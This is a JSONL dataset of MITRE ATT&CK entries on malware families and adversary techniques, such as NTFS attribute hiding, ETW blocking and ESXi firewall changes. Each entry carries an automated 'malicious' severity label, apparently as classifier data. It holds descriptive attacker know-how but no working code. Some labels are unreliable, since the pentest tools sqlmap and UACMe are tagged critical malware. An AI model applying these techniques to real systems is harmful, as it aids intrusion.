{"id": "mitre_00155", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# 4H RAT\n\nType: malware\nPlatforms: Windows\n\n[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "4H RAT", "malware_type": "malware"}}]}
{"id": "mitre_00156", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NTFS File Attributes\n\nTechnique: T1564.004\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1564.004", "technique_name": "NTFS File Attributes", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00157", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Environmental Keying\n\nTechnique: T1480.001\nTactics: defense-evasion\nPlatforms: Linux, Windows, macOS\n\nAdversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involv", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1480.001", "technique_name": "Environmental Keying", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00158", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Woody RAT\n\nType: malware\nPlatforms: Windows\n\n [Woody RAT](https://attack.mitre.org/software/S1065) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.(Citation: MalwareBytes WoodyRAT Aug 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Woody RAT", "malware_type": "malware"}}]}
{"id": "mitre_00159", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Server\n\nTechnique: T1584.004\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1584.004", "technique_name": "Server", "tactics": ["resource-development"]}}]}
{"id": "mitre_00160", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Startup Items\n\nTechnique: T1037.005\nTactics: persistence, privilege-escalation\nPlatforms: macOS\n\nAdversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn\u2019t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1037.005", "technique_name": "Startup Items", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00161", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NetTraveler\n\nType: malware\nPlatforms: Windows\n\n[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "NetTraveler", "malware_type": "malware"}}]}
{"id": "mitre_00162", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Local Email Collection\n\nTechnique: T1114.001\nTactics: collection\nPlatforms: Windows\n\nAdversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1114.001", "technique_name": "Local Email Collection", "tactics": ["collection"]}}]}
{"id": "mitre_00163", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Proton\n\nType: malware\nPlatforms: macOS\n\n[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access (Citation: objsee mac malware 2017).", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Proton", "malware_type": "malware"}}]}
{"id": "mitre_00164", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Caterpillar WebShell\n\nType: malware\nPlatforms: Windows\n\n[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Caterpillar WebShell", "malware_type": "malware"}}]}
{"id": "mitre_00165", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Matryoshka\n\nType: malware\nPlatforms: Windows\n\n[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Matryoshka", "malware_type": "malware"}}]}
{"id": "mitre_00166", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Time Providers\n\nTechnique: T1209\nTactics: persistence\nPlatforms: Windows\n\nThe Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1209", "technique_name": "Time Providers", "tactics": ["persistence"]}}]}
{"id": "mitre_00167", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Virtual Machine Discovery\n\nTechnique: T1673\nTactics: discovery\nPlatforms: ESXi, Linux, macOS, Windows\n\nAn adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list of VMs on an ESXi hypervisor using a [Hypervisor CLI](https://attack.mitre.org/techniques/T1059/012) such as `esxcli` or `vim-cmd` (e.g. `esxcli vm process list or vim-cmd vmsvc/getallvms`).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: TrendMicro Play) Adversaries may also directly leverage a graphical user interface, such as VMware vCenter, in order to view virtual machines on a host. \n\nAdversaries may use the information from [Virtual Machine Discovery](https://attack.mitre.org/techniques/T1673) during discovery to shape follow-on behaviors. Subsequently discovered VMs may be leveraged for follow-on activities such as [Service Stop](https://attack.mitre.org/techniques/T1489) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1673", "technique_name": "Virtual Machine Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00168", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hi-Zor\n\nType: malware\nPlatforms: Windows\n\n[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Hi-Zor", "malware_type": "malware"}}]}
{"id": "mitre_00169", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BlackByte 2.0 Ransomware\n\nType: malware\nPlatforms: Windows\n\n[BlackByte 2.0 Ransomware](https://attack.mitre.org/software/S1181) is a replacement for [BlackByte Ransomware](https://attack.mitre.org/software/S1180). Unlike [BlackByte Ransomware](https://attack.mitre.org/software/S1180), [BlackByte 2.0 Ransomware](https://attack.mitre.org/software/S1181) does not have a common key for victim decryption. [BlackByte 2.0 Ransomware](https://attack.mitre.org/software/S1181) remains uniquely associated with [BlackByte](https://attack.mitre.org/groups/G1043) operations.(Citation: Microsoft BlackByte 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BlackByte 2.0 Ransomware", "malware_type": "malware"}}]}
{"id": "mitre_00170", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Trust Modification\n\nTechnique: T1484.002\nTactics: defense-evasion, privilege-escalation\nPlatforms: Identity Provider, Windows\n\nAdversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \n\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1484.002", "technique_name": "Trust Modification", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00171", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Web Service\n\nTechnique: T1102\nTactics: command-and-control\nPlatforms: ESXi, Linux, Windows, macOS\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1102", "technique_name": "Web Service", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00172", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# JamPlus\n\nTechnique: T1127.003\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may use `JamPlus` to proxy the execution of a malicious script. `JamPlus` is a build utility tool for code and data build systems. It works with several popular compilers and can be used for generating workspaces in code editors such as Visual Studio.(Citation: JamPlus manual)\n\nAdversaries may abuse the `JamPlus` build utility to execute malicious scripts via a `.jam` file, which describes the build process and required dependencies. Because the malicious script is executed from a reputable developer tool, it may subvert application control security systems such as Smart App Control.(Citation: Cyble)(Citation: Elastic Security Labs)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1127.003", "technique_name": "JamPlus", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00173", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Compiled HTML File\n\nTechnique: T1218.001\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1218.001", "technique_name": "Compiled HTML File", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00174", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Explosive\n\nType: malware\nPlatforms: Windows\n\n[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Explosive", "malware_type": "malware"}}]}
{"id": "mitre_00175", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Gather Victim Network Information\n\nTechnique: T1590\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1590", "technique_name": "Gather Victim Network Information", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00176", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BPFDoor\n\nType: malware\nPlatforms: Linux\n\n[BPFDoor](https://attack.mitre.org/software/S1161) is a Linux based passive long-term backdoor used by China-based threat actors. First seen in 2021, [BPFDoor](https://attack.mitre.org/software/S1161) is named after its usage of Berkley Packet Filter (BPF) to execute single task instructions. [BPFDoor](https://attack.mitre.org/software/S1161) supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP and can start local or reverse shells that bypass firewalls using iptables.(Citation: Sandfly BPFDoor 2022)(Citation: Deep Instinct BPFDoor 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BPFDoor", "malware_type": "malware"}}]}
{"id": "mitre_00177", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SslMM\n\nType: malware\nPlatforms: Windows\n\n[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SslMM", "malware_type": "malware"}}]}
{"id": "mitre_00178", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Web Shell\n\nTechnique: T1100\nTactics: persistence, privilege-escalation\nPlatforms: Linux, Windows, macOS\n\nA Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)\n\nWeb shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1100", "technique_name": "Web Shell", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00179", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# UACMe\n\nType: tool\n\n[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "UACMe", "malware_type": "tool"}}]}
{"id": "mitre_00180", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BlackEnergy\n\nType: malware\nPlatforms: Windows\n\n[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BlackEnergy", "malware_type": "malware"}}]}
{"id": "mitre_00181", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LoudMiner\n\nType: malware\nPlatforms: macOS, Windows\n\n[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "LoudMiner", "malware_type": "malware"}}]}
{"id": "mitre_00182", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Indicator Blocking\n\nTechnique: T1054\nTactics: defense-evasion\nPlatforms: Windows\n\nAn adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1054", "technique_name": "Indicator Blocking", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00183", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Zebrocy\n\nType: malware\nPlatforms: Windows\n\n[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Zebrocy", "malware_type": "malware"}}]}
{"id": "mitre_00184", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Resource Forking\n\nTechnique: T1564.009\nTactics: defense-evasion\nPlatforms: macOS\n\nAdversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file\u2019s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1564.009", "technique_name": "Resource Forking", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00185", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Disable or Modify System Firewall\n\nTechnique: T1562.004\nTactics: defense-evasion\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)\n\nAdversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.\n\nIn ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1562.004", "technique_name": "Disable or Modify System Firewall", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00186", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LunarMail\n\nType: malware\nPlatforms: Windows\n\n[LunarMail](https://attack.mitre.org/software/S1142) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2020 including in a compromise of a European ministry of foreign affairs (MFA) in conjunction with [LunarLoader](https://attack.mitre.org/software/S1143) and [LunarWeb](https://attack.mitre.org/software/S1141). [LunarMail](https://attack.mitre.org/software/S1142) is designed to be deployed on workstations and can use email messages and [Steganography](https://attack.mitre.org/techniques/T1001/002) in command and control.(Citation: ESET Turla Lunar toolset May 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "LunarMail", "malware_type": "malware"}}]}
{"id": "mitre_00187", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Siloscape\n\nType: malware\nPlatforms: Windows, Containers\n\n[Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Siloscape", "malware_type": "malware"}}]}
{"id": "mitre_00188", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# sqlmap\n\nType: tool\n\n[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "sqlmap", "malware_type": "tool"}}]}
